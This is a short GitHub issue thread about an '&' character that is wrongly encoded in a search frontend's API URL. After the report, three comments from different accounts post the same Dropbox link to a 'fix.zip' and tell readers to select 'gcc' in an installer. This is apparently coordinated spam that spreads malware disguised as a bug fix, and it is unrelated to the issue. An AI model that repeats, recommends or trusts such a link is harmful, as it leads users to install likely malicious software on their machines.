### ISSUE TITLE
[BUG] Invalid encoding of API url (`&` char)

### ISSUE THREAD

**Issue by aleksasiriski** [hearchco/frontend#454]
Continuation of https://github.com/hearchco/frontend/issues/455

![image](https://github.com/user-attachments/assets/ab5269ef-8003-456a-a18c-b75de9c34e6e)
Search query: `fear & hunger steam`

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
